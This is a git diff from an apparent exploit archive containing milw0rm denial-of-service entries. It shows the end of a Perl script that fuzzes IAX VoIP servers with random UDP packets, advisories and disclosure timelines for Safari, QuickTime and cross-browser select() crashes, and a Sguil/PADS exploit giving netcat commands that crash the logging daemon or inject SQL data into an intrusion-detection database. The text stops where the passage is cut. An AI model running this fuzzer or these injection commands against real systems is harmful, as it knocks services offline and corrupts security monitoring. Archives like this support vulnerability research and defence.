for(my $c=0;$c<=0;$c++) {# Timestamp 8byte + #for(my $d=0;$d<=0;$d++) {# Out Seq # 2byte + my $loopD=1; + #for(my $d=unpack("H2",pack("H2",int(rand(256))));$loopD;$d++) {# Out Seq # 2byte + # $loopD=0; + + my $outbound_seq = unpack("H2",pack("H2",int(rand(256)))); + my $inbound_seq = unpack("H2",pack("H2",int(rand(256)))); + + + #if($verbose) {print(sprintf("%04x",$a)." ".sprintf("%04x",$b)." ".sprintf("%08x",$c)." ".sprintf("%02x",$d)."\n"); } + for(my $d=0;1;$d++) { + for(my $e=0;1;$e++) {# In Seq # 2byte + foreach my $frameType (keys(%iaxFrameTypes)) { + foreach my $frameKey (keys(%iaxControlFrames)) { + foreach my $ie (keys(%iaxIE)) { + for(my $f=0;$f<=0;$f++) { + my $maxDust=10; + if($listen) { $maxDust/=2; } + if(defined($dust) && length($dust) > 0) { $maxDust=$dust; } + for(my $z=1;$z<=$maxDust;$z++) { + my $len = int(rand(9)); + my $box= int(rand("9"x(($len+1)))); + for(my $zz=1;$zz<=$maxDust;$zz++) { + my $hex_msg = sprintf("%04x",$a).sprintf("%04x",$b).sprintf("%08x",$c).sprintf("%02x",$d).sprintf("%02x",$e). $iaxFrameTypes{$frameType} . $iaxControlFrames{$frameKey} . $iaxIE{$ie} . sprintf("%02x",$f) . sprintf("%0".$len."x",$box); + if($verbose) {print("[" . scalar(localtime) . "] '" . $frameType."_".$frameKey."_".$ie."_".sprintf("%02x",$f)."_".sprintf("%0".$len."x",$box)."'\n"); } + foreach my $var (sendUDPSocket($hex_msg,$target,$port,1,$listen)) { if($verbose) { print($var."_"); } } + } + }}}}}}}}}} #<------ VERY IMPORTANT +} + +sub retIAXHostActive { + my($target,$port,@args)=@_; + my $out_msg=''; + if(my @recv = sendUDPSocket($out_msg,$target,$port,1,1)) { + return 1; + } + return 0; +} + +sub retHosts { + my($host,@args)=@_; + my @addrs; + + if(!$host) { return ('127.0.0.1') }; + + if($host =~ /^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})\/([\d]{1,2})$/ && $1 >= 0 && $1 <= 255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4 >= 0 && $4 <= 255) { + #Check to see if host is valid class C CIDR Address + if($verbose) { print("Setting CIDR Address Range\n"); } + my $sn = Net::Subnets->new; + + my($low,$high)=$sn->range(\$host); + if($verbose) { print("Determined IP Ranges From $$low - $$high\n"); } + return \@{ $sn->list(\($$low,$$high)) }; + }elsif($host =~ /^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})$/ && $1 >= 0 && $1 <= 255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4 >= 0 && $4 <= 255) { + #Check to see if host is valid IP + push(@addrs,"$1.$2.$3.$4"); + }else{ + push(@addrs,$host); + } + return \@addrs; +} + +sub displayIAXRaw { + my($respaddr,$port,$out_msg,$in_msg)=@_; + + if(defined($in_msg) && unpack("H*",$in_msg) ne '80000000000000000000060a') { + print("[" . scalar(localtime) . "] $respaddr:$port\t$respaddr\t" . unpack("H*",$out_msg) . "\t". unpack("H*",$in_msg) . "\n"); + }elsif(defined($respaddr) && defined($port)) { + print(scalar(localtime) . " $respaddr:$port\t$respaddr\n"); + + } +} + +sub displayIAXPacket { + my($hex_msg,@args)=@_; + + my $width=32/8; + + for(my $i=0;$i*$width<=length($hex_msg);$i++) { + print(substr($hex_msg,$i*$width,$width)."\n"); + } + #print $hex_msg."\n"; +} + +sub printUsage { + print "$0 --dos\n\t\tWill loop through known or manually preset packet combinations.\n"; + print "$0 --bruteforce\n\t\tBrute force fuzzes on default port of 4569. It will try random data packaging at the end of a valid packet. It will by default send 10 per each packet.\n"; + print "$0 -h 127.0.0.1 --bruteforce --dust 1\n\t\tBrute force fuzzes on default port of 4569. It will try random data packaging at the end of a valid packet. It will only send 1 of each packet.\n"; + print "$0 \n\t\tScans the loopback interface by rough usage from IETF guidelines.\n"; + exit; +} + +sub logAndPrint { + my($string,@args)=@); + + if(1==1 || defined($string)) { + print $string; + open(FLE,">>$0_logs_[".scalar(localtime)."] $string"); + print FLE $string; + close(FLE); + } +} + +# milw0rm.com [2009-06-12] diff --git a/platforms/multiple/dos/8957.txt b/platforms/multiple/dos/8957.txt index a3342f299..0a64b79e1 100755 --- a/platforms/multiple/dos/8957.txt +++ b/platforms/multiple/dos/8957.txt @@ -1,130 +1,130 @@ -________________________________________________________________________ - - Apple Safari & Quicktime Denial of Service -________________________________________________________________________ - -Shameless plug : ------------------------------------------------------------------------- -You are invited to join the 2009 edition of HACK.LU, a small but -concentrated luxemburgish security conference. -More information : http://www.hack.lu - CFP is open, sponsorship is still -possible and warmly welcomed. ------------------------------------------------------------------------- - -Release mode: Coordinated -Ref : [TZO-36-2009] - Apple Safari & Quicktime DoS -Vendor : http://www.apple.com -WWW : http://blog.zoller.lu/2009/05/advisory-apple-safari-quicktime-dos.html -Status : Not patched -Credit : none given (Apple can't find a place to credit) -Discovered : 18.11.2008 Zoller, 19.06.2009 Alexios Fakos (probably plenty - of others) -Security notification reaction rating : good -Notification to patch window : n+1 - -Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html - -Affected products -- Apple Safari (all) -- Quicktime (all) - - -I. Background -~~~~~~~~~~~ -Wikipedia quote: "Apple Inc. (NASDAQ: AAPL) is an American multinational -corporation which designs and manufactures consumer electronics and -software products. The company's best-known hardware products include -Macintosh computers, the iPod and the iPhone." - -II. Description -~~~~~~~~~~~~~ -A null pointer is being dereference when CFRelease() is called on NULL. - -III. Impact -~~~~~~~~~ -The browser will crash, your data might be lost. - -IV. Proof of concept (hold your breath) -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - - - - -V. Disclosure timeline -~~~~~~~~~~~~~~~~~~~~~~~ -DD/MM/YYYY -18/11/2008 : Send proof of concept file and a description that failed to - give the correct impact. - -25/11/2009 : Apple acknowledges receipt and reproducability : - "After investigating this issue further, we've determined - that the crash your test case triggers is caused by - dereferencing a null pointer and not from a format string issue" - -20/01/2009 : Ask for an update - -23/01/2009 : Apple sends an encrypted and signed PGP mail, fine, however the mail - is encrypted with their own key - -23/01/2009 : Ask for the mail to be resend as I don't have Apple's private key - -24/01/2009 : Apple states that "Regarding the QuickTime null dereference you - reported, this bug is still being worked on by our engineers - and is not addressed in QuickTime 7.6" - -26/01/2009 : Ask apple for a fix timeline as this is an ridiculouly easy to fix - vulnerability - -27/01/2009 : Apple statest "Regarding the QuickTime null deref issue, it is - currently set to be part of the next QuickTime update. [..] - Additionally, we do not intend to describe this crasher in our - security advisory. - - Note: No Security advisory = no credit, should have published here. - -28/01/2009: Apple states "Given that we are handling this as a crasher and - not as a security exposure, it stands to reason that you may - want to disclose it without waiting for the update that - addresses it and without further coordination with Apple. - We do appreciate the fact that you reported it to us and are - intending to address it in the next available update" - -[..] -[Several discussion about CIA, why a DoS against the iPhone is worth a security -advisory, when it isn't against safari.. etc. I spare you the details] -[..] - -29/01/2009 : Ask why I should hold disclosure for a DoS in a particular - portable apple product but disclose DoS in other apple products. - Asked apple to make a choice, either DoS is a security issue and - I won't disclose or it isn't and I disclose all of them, - including the one in the very portable apple product - -30/01/2009 : Apple answers that - "Your QuickTime and Safari issues constitute denial of service. - We consider any denial of service issue to be security related, - and they are important to fix. We plan to fix the ones you - reported in the next available updates." - - "I believe we can put credit in an appropriate place for the - WebKit/Safari change. I was not able to locate a suitable place - for crediting the QuickTime crasher" - -Fast forward 5 months, and apple releases a stream of code execution bug fixes -for Quicktime. - -01/06/2009 : Ask for an update and if the DoS condition has been fixed - -02/06/2009 : Apple states that - "According to our bug tracking system the null-dereference crasher - issue is not yet addressed in QuickTime. We are investigating - now to see if for some reason the latest version has picked up - changes that address this issue and will send you feedback - today about it." - -In summary, no credit, no advisory, and 7 months of time to (not) fix a -single line of code. - -10/06/2009 : Release of this advisory - -# milw0rm.com [2009-06-15] +________________________________________________________________________ + + Apple Safari & Quicktime Denial of Service +________________________________________________________________________ + +Shameless plug : +------------------------------------------------------------------------ +You are invited to join the 2009 edition of HACK.LU, a small but +concentrated luxemburgish security conference. +More information : http://www.hack.lu - CFP is open, sponsorship is still +possible and warmly welcomed. +------------------------------------------------------------------------ + +Release mode: Coordinated +Ref : [TZO-36-2009] - Apple Safari & Quicktime DoS +Vendor : http://www.apple.com +WWW : http://blog.zoller.lu/2009/05/advisory-apple-safari-quicktime-dos.html +Status : Not patched +Credit : none given (Apple can't find a place to credit) +Discovered : 18.11.2008 Zoller, 19.06.2009 Alexios Fakos (probably plenty + of others) +Security notification reaction rating : good +Notification to patch window : n+1 + +Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html + +Affected products +- Apple Safari (all) +- Quicktime (all) + + +I. Background +~~~~~~~~~~~ +Wikipedia quote: "Apple Inc. (NASDAQ: AAPL) is an American multinational +corporation which designs and manufactures consumer electronics and +software products. The company's best-known hardware products include +Macintosh computers, the iPod and the iPhone." + +II. Description +~~~~~~~~~~~~~ +A null pointer is being dereference when CFRelease() is called on NULL. + +III. Impact +~~~~~~~~~ +The browser will crash, your data might be lost. + +IV. Proof of concept (hold your breath) +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + + + +V. Disclosure timeline +~~~~~~~~~~~~~~~~~~~~~~~ +DD/MM/YYYY +18/11/2008 : Send proof of concept file and a description that failed to + give the correct impact. + +25/11/2009 : Apple acknowledges receipt and reproducability : + "After investigating this issue further, we've determined + that the crash your test case triggers is caused by + dereferencing a null pointer and not from a format string issue" + +20/01/2009 : Ask for an update + +23/01/2009 : Apple sends an encrypted and signed PGP mail, fine, however the mail + is encrypted with their own key + +23/01/2009 : Ask for the mail to be resend as I don't have Apple's private key + +24/01/2009 : Apple states that "Regarding the QuickTime null dereference you + reported, this bug is still being worked on by our engineers + and is not addressed in QuickTime 7.6" + +26/01/2009 : Ask apple for a fix timeline as this is an ridiculouly easy to fix + vulnerability + +27/01/2009 : Apple statest "Regarding the QuickTime null deref issue, it is + currently set to be part of the next QuickTime update. [..] + Additionally, we do not intend to describe this crasher in our + security advisory. + + Note: No Security advisory = no credit, should have published here. + +28/01/2009: Apple states "Given that we are handling this as a crasher and + not as a security exposure, it stands to reason that you may + want to disclose it without waiting for the update that + addresses it and without further coordination with Apple. + We do appreciate the fact that you reported it to us and are + intending to address it in the next available update" + +[..] +[Several discussion about CIA, why a DoS against the iPhone is worth a security +advisory, when it isn't against safari.. etc. I spare you the details] +[..] + +29/01/2009 : Ask why I should hold disclosure for a DoS in a particular + portable apple product but disclose DoS in other apple products. + Asked apple to make a choice, either DoS is a security issue and + I won't disclose or it isn't and I disclose all of them, + including the one in the very portable apple product + +30/01/2009 : Apple answers that + "Your QuickTime and Safari issues constitute denial of service. + We consider any denial of service issue to be security related, + and they are important to fix. We plan to fix the ones you + reported in the next available updates." + + "I believe we can put credit in an appropriate place for the + WebKit/Safari change. I was not able to locate a suitable place + for crediting the QuickTime crasher" + +Fast forward 5 months, and apple releases a stream of code execution bug fixes +for Quicktime. + +01/06/2009 : Ask for an update and if the DoS condition has been fixed + +02/06/2009 : Apple states that + "According to our bug tracking system the null-dereference crasher + issue is not yet addressed in QuickTime. We are investigating + now to see if for some reason the latest version has picked up + changes that address this issue and will send you feedback + today about it." + +In summary, no credit, no advisory, and 7 months of time to (not) fix a +single line of code. + +10/06/2009 : Release of this advisory + +# milw0rm.com [2009-06-15] diff --git a/platforms/multiple/dos/9071.txt b/platforms/multiple/dos/9071.txt index ef823441c..14bf1a019 100755 --- a/platforms/multiple/dos/9071.txt +++ b/platforms/multiple/dos/9071.txt @@ -1,84 +1,84 @@ -___________________________________________________________________________________ - -Apple Safari 4.x JavaScript Reload Denial of Service -___________________________________________________________________________________ - -Author : Marcell 'SkyOut' Dietl, Achim Hoffmann -Email : mail [at] marcell-dietl [dot] de -Vendor : http://www.apple.com/ -Product : http://www.apple.com/safari/ -Found : 12.06.2009 -Released : 01.07.2009 - -Tested on: - - Safari 4.0 at Windows XP SP3 - - Safari 4.0.1 at Mac OS X 10.5.7 -___________________________________________________________________________________ -STEPS TO REPRODUCE - -1) Create a HTML file with the following content: - -+---------- -| -| -| -| -| -| -+---------- - -2) Create an empty file called "empty.js" in the same directory. - -3) Put both files into the WWW directory of your server. - -4) Access the HTML file with your browser. - - A popup will appear: Close it. - - A popup will appear: Close it. - - Crash. - -5) On Windows: - -+---------- -| AppName: safari.exe AppVer: 4.530.17.0 ModName: webkit.dll -| ModVer: 4.530.17.0 Offset: 00305f55 -+---------- - -5) On Mac OS X: - -+---------- -| Process: Safari [298] -| Path: /Applications/Safari.app/Contents/MacOS/Safari -| Identifier: com.apple.Safari -| Version: 4.0.1 (5530.18) -| Build Info: WebBrowser-55301800~1 -| Code Type: X86 (Native) -| Parent Process: launchd [163] -| -| Date/Time: 2009-07-01 00:58:48.144 +0200 -| OS Version: Mac OS X 10.5.7 (9J61) -| Report Version: 6 -| -| Exception Type: EXC_BAD_ACCESS (SIGBUS) -| Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000002 -| -| Thread 0 crashed with X86 Thread State (32-bit): -| eax: 0x00000002 ebx: 0x900bac11 ecx: 0x00625eec edx: 0x00000000 -| edi: 0x00625ec8 esi: 0x00000002 ebp: 0xbfffe778 esp: 0xbfffe5e0 -| ss: 0x0000001f efl: 0x00010217 eip: 0x900bac74 cs: 0x00000017 -| ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037 -| cr2: 0x00000002 -+---------- -___________________________________________________________________________________ -Advisory : http://marcell-dietl.de/index/adv_safari_4_x_js_reload_dos.php - -Live Demo : http://marcell-dietl.de/index/demo_safari_4_x_js_reload_dos.html - -Apple has been informed about the bug, but did not show any interest. -___________________________________________________________________________________ -HAVING FUN WITH FULL DISCLOSURE SINCE 2006 - -# milw0rm.com [2009-07-02] +___________________________________________________________________________________ + +Apple Safari 4.x JavaScript Reload Denial of Service +___________________________________________________________________________________ + +Author : Marcell 'SkyOut' Dietl, Achim Hoffmann +Email : mail [at] marcell-dietl [dot] de +Vendor : http://www.apple.com/ +Product : http://www.apple.com/safari/ +Found : 12.06.2009 +Released : 01.07.2009 + +Tested on: + - Safari 4.0 at Windows XP SP3 + - Safari 4.0.1 at Mac OS X 10.5.7 +___________________________________________________________________________________ +STEPS TO REPRODUCE + +1) Create a HTML file with the following content: + ++---------- +| +| +| +| +| +| ++---------- + +2) Create an empty file called "empty.js" in the same directory. + +3) Put both files into the WWW directory of your server. + +4) Access the HTML file with your browser. + - A popup will appear: Close it. + - A popup will appear: Close it. + - Crash. + +5) On Windows: + ++---------- +| AppName: safari.exe AppVer: 4.530.17.0 ModName: webkit.dll +| ModVer: 4.530.17.0 Offset: 00305f55 ++---------- + +5) On Mac OS X: + ++---------- +| Process: Safari [298] +| Path: /Applications/Safari.app/Contents/MacOS/Safari +| Identifier: com.apple.Safari +| Version: 4.0.1 (5530.18) +| Build Info: WebBrowser-55301800~1 +| Code Type: X86 (Native) +| Parent Process: launchd [163] +| +| Date/Time: 2009-07-01 00:58:48.144 +0200 +| OS Version: Mac OS X 10.5.7 (9J61) +| Report Version: 6 +| +| Exception Type: EXC_BAD_ACCESS (SIGBUS) +| Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000002 +| +| Thread 0 crashed with X86 Thread State (32-bit): +| eax: 0x00000002 ebx: 0x900bac11 ecx: 0x00625eec edx: 0x00000000 +| edi: 0x00625ec8 esi: 0x00000002 ebp: 0xbfffe778 esp: 0xbfffe5e0 +| ss: 0x0000001f efl: 0x00010217 eip: 0x900bac74 cs: 0x00000017 +| ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037 +| cr2: 0x00000002 ++---------- +___________________________________________________________________________________ +Advisory : http://marcell-dietl.de/index/adv_safari_4_x_js_reload_dos.php + +Live Demo : http://marcell-dietl.de/index/demo_safari_4_x_js_reload_dos.html + +Apple has been informed about the bug, but did not show any interest. +___________________________________________________________________________________ +HAVING FUN WITH FULL DISCLOSURE SINCE 2006 + +# milw0rm.com [2009-07-02] diff --git a/platforms/multiple/dos/9160.txt b/platforms/multiple/dos/9160.txt index a87c402c5..240b6852c 100755 --- a/platforms/multiple/dos/9160.txt +++ b/platforms/multiple/dos/9160.txt @@ -1,148 +1,148 @@ -________________________________________________________________________ - - One bug to rule them all - IE5,IE6,IE7,IE8,Netscape,Firefox,Safari,Opera,Konqueror, - Seamonkey,Wii,PS3,iPhone,iPod,Nokia,Siemens.... and more. - Don't wet your pants - it's DoS only -________________________________________________________________________ - -Release mode: Tried hard to coordinate - gave up -Reference : [GSEC-TZO-26-2009] - One bug to rule them all -WWW : http://www.g-sec.lu/one-bug-to-rule-them-all.html -Vendors : -http://www.firefox.com -http://www.apple.com -http://www.opera.com -http://www.sony.com -http://www.nintendo.com -http://www.nokia.com -http://www.siemens.com -others.. -Status : Varies -CVE : CVE-2009-1692 (created by apple same root cause) -Credit : Except Apple - nobody - -Affected products : -~~~~~~~~~~~~~~~~~ -- Internet Explorer 5, 6, 7, 8 (all versions) -- Chrome (limited) -- Opera -- Seamonkey -- Midbrowser -- Netscape 6 & 8 (9 years ago) -- Konqueror (all versions) -- Apple iPhone + iPod -- Apple Safari -- Thunderbird -- Nokia Phones : Nokia N95 (Symbian OS v.9.2),Nokia N82, Nokia N810 Internet Tablet -- Aigo P8860 (Browser hangs and cannot be restarted) -- Siemens phones -- Google T-Mobile G1 TC4-RC30 -- Ubuntu (Operating system sometimes reboots, memory management failure) -- possibly more devices and products that support Javascript, -try it yourselves. POC here : http://www.crashthisthing.com/select.html - -Patch availability : -~~~~~~~~~~~~~~~~~~ -- Mozilla : Fixed in Firefox 3.0.5 and 2.0.0.19 -https://bugzilla.mozilla.org/show_bug.cgi?id=460713 -- Apple iPhone&iPod : patched -- IE : No patch for IE5, IE6, IE7, IE8 until IE9 -- Webkit : Patched in r41741 - https://bugs.webkit.org/show_bug.cgi?id=23319 -- Chrome : Patched, unknown which version) -- Opera : Patched after version 9.64 -- Thunderbird (unknown) -- Konqueror : unknown (did not respond) -- Nokia : unknown, opened a case but never came back -- Aigo P8860 : unknown -- Siemens : unknown -- Others ? Find out by visiting the POC at -http://crashthisthing.com/select.html - - -I. Background -~~~~~~~~~~~ -Quoting Wikipedia "ECMAScript is a scripting language, standardized by Ecma -International in the ECMA-262 specification and ISO/IEC 16262. The language -is widely used on the web, especially in the form of its three best-known -dialects, JavaScript, ActionScript, and JScript." - - -II. Description -~~~~~~~~~~~~~ -Calling the select() method with a large integer, results in continuos -allocation of x+n bytes of memory exhausting memory after a while. -The impact varies from null pointer dereference (no more memory,hence -crashing the browser) to the reboot of the complete Operation System -(Konqueror&Ubuntu) - -There had never been a limit specified as to how many html elements the select -call should handle, after the report of this Bug, vendors apparently agreed to a -limit of 10.000 elements : "Talked to some Apple and Opera guys at the -WHATWG social, and we decided this was a good number" - -III. Impact -~~~~~~~~~ -The Impact varies from Browser to Browser and from OS to OS. - -Here is a small excerpt: -- Konqueror (Ubuntu)- allocates 2GB of memory then either crashes -the Browser or (most often) the OS reboots. Ubuntu's memory -management system appears to be configured as to NOT stop the process -that consumes too much memory, but a random process. -This sometimes leads to processes that are vital for the OS to -be killed, hence the reboot. I am not kidding. Thanks to -'FX' for Memory management hint. - -- Chrome : allocates 2GB of memory then crashes tab with a null pointer - -- Firefox : allocates 2GB of memory then the Browser crashes - -- IE5,6,7,8 : allocates 2GB of memory then the Browser crashes - -- Opera : Allocated and commits as much memory as available, -will not crash but other applications will become unstable - -- Nintento WII (Opera) : Console hangs, needs hard reset -Video: http://vimeo.com/2937101 (Thanks to David Raison) - -- Sony PS3 - Console hangs, needs hard reset -Video: http://vimeo.com/2937101 (Thanks to Chris Gates) - -- iPhone - iPhone hangs and needs hard reset -Video: http://vimeo.com/2873339 (Thanks to g0tcha) - -- Aigo P8860 (Browser hangs and cannot be restarted) - - -IV. Proof of concept -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - - -URL: http://www.crashthisthing.com/select.html - -Some have not understood what this code does, it does NOT loop as some vendors -claimed, it just calls select.lenght() ONCE with a huge integer. One might wonder -if over the 9 last years that this bug existed, nobody ever entered a large -number in a select.lenght() call. - -IV. Disclosure timeline -~~~~~~~~~~~~~~~~~~~~~~~ -Nothing particular to note, except the usual discussion about availability being -a security issue. - -V. Thanks -~~~~~~~~~~~~~~~~~~~~~~~ -Chris Gates, David Raison, Fahem Adam, a team of engineers that recognise themselves -and oCert for not helping coordinate this bug. - -# milw0rm.com [2009-07-15] +________________________________________________________________________ + + One bug to rule them all + IE5,IE6,IE7,IE8,Netscape,Firefox,Safari,Opera,Konqueror, + Seamonkey,Wii,PS3,iPhone,iPod,Nokia,Siemens.... and more. + Don't wet your pants - it's DoS only +________________________________________________________________________ + +Release mode: Tried hard to coordinate - gave up +Reference : [GSEC-TZO-26-2009] - One bug to rule them all +WWW : http://www.g-sec.lu/one-bug-to-rule-them-all.html +Vendors : +http://www.firefox.com +http://www.apple.com +http://www.opera.com +http://www.sony.com +http://www.nintendo.com +http://www.nokia.com +http://www.siemens.com +others.. +Status : Varies +CVE : CVE-2009-1692 (created by apple same root cause) +Credit : Except Apple - nobody + +Affected products : +~~~~~~~~~~~~~~~~~ +- Internet Explorer 5, 6, 7, 8 (all versions) +- Chrome (limited) +- Opera +- Seamonkey +- Midbrowser +- Netscape 6 & 8 (9 years ago) +- Konqueror (all versions) +- Apple iPhone + iPod +- Apple Safari +- Thunderbird +- Nokia Phones : Nokia N95 (Symbian OS v.9.2),Nokia N82, Nokia N810 Internet Tablet +- Aigo P8860 (Browser hangs and cannot be restarted) +- Siemens phones +- Google T-Mobile G1 TC4-RC30 +- Ubuntu (Operating system sometimes reboots, memory management failure) +- possibly more devices and products that support Javascript, +try it yourselves. POC here : http://www.crashthisthing.com/select.html + +Patch availability : +~~~~~~~~~~~~~~~~~~ +- Mozilla : Fixed in Firefox 3.0.5 and 2.0.0.19 +https://bugzilla.mozilla.org/show_bug.cgi?id=460713 +- Apple iPhone&iPod : patched +- IE : No patch for IE5, IE6, IE7, IE8 until IE9 +- Webkit : Patched in r41741 - https://bugs.webkit.org/show_bug.cgi?id=23319 +- Chrome : Patched, unknown which version) +- Opera : Patched after version 9.64 +- Thunderbird (unknown) +- Konqueror : unknown (did not respond) +- Nokia : unknown, opened a case but never came back +- Aigo P8860 : unknown +- Siemens : unknown +- Others ? Find out by visiting the POC at +http://crashthisthing.com/select.html + + +I. Background +~~~~~~~~~~~ +Quoting Wikipedia "ECMAScript is a scripting language, standardized by Ecma +International in the ECMA-262 specification and ISO/IEC 16262. The language +is widely used on the web, especially in the form of its three best-known +dialects, JavaScript, ActionScript, and JScript." + + +II. Description +~~~~~~~~~~~~~ +Calling the select() method with a large integer, results in continuos +allocation of x+n bytes of memory exhausting memory after a while. +The impact varies from null pointer dereference (no more memory,hence +crashing the browser) to the reboot of the complete Operation System +(Konqueror&Ubuntu) + +There had never been a limit specified as to how many html elements the select +call should handle, after the report of this Bug, vendors apparently agreed to a +limit of 10.000 elements : "Talked to some Apple and Opera guys at the +WHATWG social, and we decided this was a good number" + +III. Impact +~~~~~~~~~ +The Impact varies from Browser to Browser and from OS to OS. + +Here is a small excerpt: +- Konqueror (Ubuntu)- allocates 2GB of memory then either crashes +the Browser or (most often) the OS reboots. Ubuntu's memory +management system appears to be configured as to NOT stop the process +that consumes too much memory, but a random process. +This sometimes leads to processes that are vital for the OS to +be killed, hence the reboot. I am not kidding. Thanks to +'FX' for Memory management hint. + +- Chrome : allocates 2GB of memory then crashes tab with a null pointer + +- Firefox : allocates 2GB of memory then the Browser crashes + +- IE5,6,7,8 : allocates 2GB of memory then the Browser crashes + +- Opera : Allocated and commits as much memory as available, +will not crash but other applications will become unstable + +- Nintento WII (Opera) : Console hangs, needs hard reset +Video: http://vimeo.com/2937101 (Thanks to David Raison) + +- Sony PS3 - Console hangs, needs hard reset +Video: http://vimeo.com/2937101 (Thanks to Chris Gates) + +- iPhone - iPhone hangs and needs hard reset +Video: http://vimeo.com/2873339 (Thanks to g0tcha) + +- Aigo P8860 (Browser hangs and cannot be restarted) + + +IV. Proof of concept +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + +URL: http://www.crashthisthing.com/select.html + +Some have not understood what this code does, it does NOT loop as some vendors +claimed, it just calls select.lenght() ONCE with a huge integer. One might wonder +if over the 9 last years that this bug existed, nobody ever entered a large +number in a select.lenght() call. + +IV. Disclosure timeline +~~~~~~~~~~~~~~~~~~~~~~~ +Nothing particular to note, except the usual discussion about availability being +a security issue. + +V. Thanks +~~~~~~~~~~~~~~~~~~~~~~~ +Chris Gates, David Raison, Fahem Adam, a team of engineers that recognise themselves +and oCert for not helping coordinate this bug. + +# milw0rm.com [2009-07-15] diff --git a/platforms/multiple/dos/9175.txt b/platforms/multiple/dos/9175.txt index 19317a629..2ac9efd69 100755 --- a/platforms/multiple/dos/9175.txt +++ b/platforms/multiple/dos/9175.txt @@ -1,81 +1,81 @@ -Sguil/PADS Denial of Service exploit -by Ataraxia (Benjamin Rose) -Public announcement made 7/15/09. - -Please visit http://allmybase.com/ (my blog) for more up-to-date -information, and a quick patch. - -More in-depth article available at: http://allmybase.com/?p=72 - -This more in-depth article does include additional details and -the actual code that is being exploited, if you're interested... - -########################################################################## -UPDATE 7/17/09 @ 14:41: -In speaking with the creators of the sguil software, it seems that -I have greatly overestimated the reach of this bug. I had assumed that -it would be possible to run multiple SQL commands within a single TCL -mysqlexec() statement, an assumption that now seems incorrect. This means -that, at best, this hole becomes a denial of service attack that could -inject incorrect data into the sguil database, and/or kill the sguil -daemon, a noisy operation. My apologies for this initial overzealousness. -########################################################################## - -ORIGINAL POST, UNMODIFIED: -This exploit has the ability to render any Intrusion Detection -System utilizing the sguil monitoring useless. At the lowest level, -you can kill the master logging daemon that collates the data into -a MySQL database. I've also been able to inject random and useless -data into the MySQL database, which opens the door for an obfuscation -of an attack, or a flat-out denial of service attack. There also exists -the possibility of dropping the database altogether, though I was not -able to make this happen during my preliminary testing of the attack. - -The sguil sensor boxes report back to a sguil daemon on a management server, -which in turn puts the data received into a MySQL database. The sensor -collects data from many sensor agents, the most popular ones including snort -and sancp. Since snort is the de-facto standard NIDS, sguil is found in a lot -of places where there are mission-critical NIDS, making this a potent -vulnerability. The idea here is to craft a special packet containing a SQL -statement and send it across the wire, such that the sguil-agents will pick up -on it. We will exploit the Passive Asset Detection System (PADS) -> sguil -relationship, which will be monitoring for said banner packets. Thanks to the -availability of the netcat program, there is also no need for any programming -skill. Also, the attack can run on any port, so even an unprivileged user -could potentially run this attack. - -Without further ado, here's the good stuff: - -TO CRASH THE SERVER: -from a box that has its traffic monitored, run -echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’);–” | nc -l 7777 -...and then telnet to port 7777 from another box. There will be a syntax -error in the sguil management daemon's SQL insert statement, and it will -crash rather ungracefully. This is highly noticable, so be careful! - -TO INJECT DATA SILENTLY: -from a box that has its traffic monitored, run -echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’)–” | nc -l 8888 -...and then telnet to port 8888 from another box. The difference here is the -semicolon in the statement. This will insert an asset into the SQL database as -ssh version 1.4, protocol 2.0. Obviously, you can have some fun with this ;-) - -PROOF OF CONCEPT: -mysql> use sguildb; -Reading table information for completion of table and column names -You can turn off this feature to get a quicker startup with -A - -Database changed -mysql> select * from pads where `hex_payload`=’deadbeefcafe’; -+————–+—–+———-+———————+————+———+——+———-+————-+————–+ -| hostname | sid | asset_id | timestamp | ip | service | port | ip_proto | application | hex_payload | -+————–+—–+———-+———————+————+———+——+———-+————-+————–+ -| [REMOVED] | 1 | 7 | 2009-06-08 14:28:02 | [REMOVED] | ssh | 1061 | 6 | OpenSSH 1.4 | deadbeefcafe | -+————–+—–+———-+———————+————+———+——+———-+————-+————–+ -1 row in set (0.01 sec) - - -Note that you don't even need to put in legit hex into the attack for it to work. Bonus points -if you put in a hexadecimal message to the sysadmin that doesn't even contain legit hex. - -# milw0rm.com [2009-07-17] +Sguil/PADS Denial of Service exploit +by Ataraxia (Benjamin Rose) +Public announcement made 7/15/09. + +Please visit http://allmybase.com/ (my blog) for more up-to-date +information, and a quick patch. + +More in-depth article available at: http://allmybase.com/?p=72 + +This more in-depth article does include additional details and +the actual code that is being exploited, if you're interested... + +########################################################################## +UPDATE 7/17/09 @ 14:41: +In speaking with the creators of the sguil software, it seems that +I have greatly overestimated the reach of this bug. I had assumed that +it would be possible to run multiple SQL commands within a single TCL +mysqlexec() statement, an assumption that now seems incorrect. This means +that, at best, this hole becomes a denial of service attack that could +inject incorrect data into the sguil database, and/or kill the sguil +daemon, a noisy operation. My apologies for this initial overzealousness. +########################################################################## + +ORIGINAL POST, UNMODIFIED: +This exploit has the ability to render any Intrusion Detection +System utilizing the sguil monitoring useless. At the lowest level, +you can kill the master logging daemon that collates the data into +a MySQL database. I've also been able to inject random and useless +data into the MySQL database, which opens the door for an obfuscation +of an attack, or a flat-out denial of service attack. There also exists +the possibility of dropping the database altogether, though I was not +able to make this happen during my preliminary testing of the attack. + +The sguil sensor boxes report back to a sguil daemon on a management server, +which in turn puts the data received into a MySQL database. The sensor +collects data from many sensor agents, the most popular ones including snort +and sancp. Since snort is the de-facto standard NIDS, sguil is found in a lot +of places where there are mission-critical NIDS, making this a potent +vulnerability. The idea here is to craft a special packet containing a SQL +statement and send it across the wire, such that the sguil-agents will pick up +on it. We will exploit the Passive Asset Detection System (PADS) -> sguil +relationship, which will be monitoring for said banner 